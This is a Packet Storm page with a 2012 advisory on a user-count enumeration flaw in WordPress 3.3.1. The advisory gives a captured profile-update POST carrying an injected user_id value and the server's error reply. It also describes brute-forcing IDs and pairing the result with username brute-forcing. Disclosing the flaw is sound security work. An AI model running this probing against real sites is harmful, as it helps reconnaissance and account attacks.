exploit the possibilities

WordPress 3.3.1 User Count Enumeration

WordPress 3.3.1 User Count Enumeration
Posted Mar 11, 2012
Authored by HauntIT

WordPress version 3.3.1 suffers from a user count enumeration vulnerability.

tags | exploit
MD5 | e8f2ca1dab3f36b89cb1d239e5be4c8b

WordPress 3.3.1 User Count Enumeration

Change Mirror Download
# TITLE ....... # Wordpress 3.3.1 - users counter ..................... #
# DATE ........ # 15.02.2012 .......................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ......................... #
# SOFT LINK ... # http://wordpress.org................................. #
# VERSION ..... # 3.3.1 ............................................... #
# TESTED ON ... # LAMP ................................................ #
# ..................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

# 2. What is the type of vulnerability?
This is very crazy bug, because, we can not enumerate _names_ of users.
We can't get a "information-disclosure"-kind of bug.
One think we can do using this bug is getting to know
what is the number of users in Wordpress. ;)

Number of users (in webapp) can be used, to determine:
- how "popular" is this WP-site (by "popular" I mean, how many users are registered in this site);
- can be used, when You're bruteforcing names in WP.
Here, if we can get 'number of users', we can do other thing:
now we know that: (for example) in webapplication we have 10 users.
When we get number of users, we can determine next attack: bruteforce to enumerate their (users) names.
So, when doing this, we have some kind of 'default login list' file for bruteforce.
Via this file, bruteforcing-progress tells us, that (from logins.txt) we find out 7 names.
So connecting this information with information from our bug - we can know, that
in webapplication is 3 more names(users) to 'get'.

I tested this vulnerability for registered user. Role for him was subscriber (so "the lowest" of registered users).

# 3. Where is bug :)
Here I'll present some BurpProxy traffic dump:

...cut...
POST /www/Wordpress/wordpress/wp-admin/profile.php HTTP/1.1
Host: localhost
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Connection: close

_wpnonce=f175245608&_wp_http_referer=%2Fwww%2FWordpress%2Fwordpress%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&admin_color=fresh&admin_bar_front=1&first_name=tester&last_name=tester&nickname=tester&display_name=tester&email=tester%40tester.com&url=&aim=&yim=&jabber=&description=&pass1=&pass2=&action=update&user_id=23 OR 1=2&submit=Update+Profile
...cut...*

If this user_id exists, we'll get an information that:
- we can not edit this user/profile
- we can edit this user/profile (here won't be info like "now You can change other users";). If
we have permmitions here to change (others), we will change it (no warning or other "communicate" here)

If there is not user_id = (our intiger), than Wordpress tell us:
...cut...
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Feb 2012 23:34:34 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.7
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 15 Feb 2012 23:34:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2923

<!DOCTYPE html>
<!-- Ticket #11289, IE bug fix:(...) -->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WordPress &rsaquo; Error</title>
<style type="text/css">
(...)

</style>
</head>
<body id="error-page">
<p>Invalid user ID.</p></body>
</html>


...cut...

So now by bruteforcing numbers with this HTTP POST, authenticated (normal registered) user
can find out how many users is in the application.

# 4. More...

- http://www.wordpress.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

# Best regards
#
Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close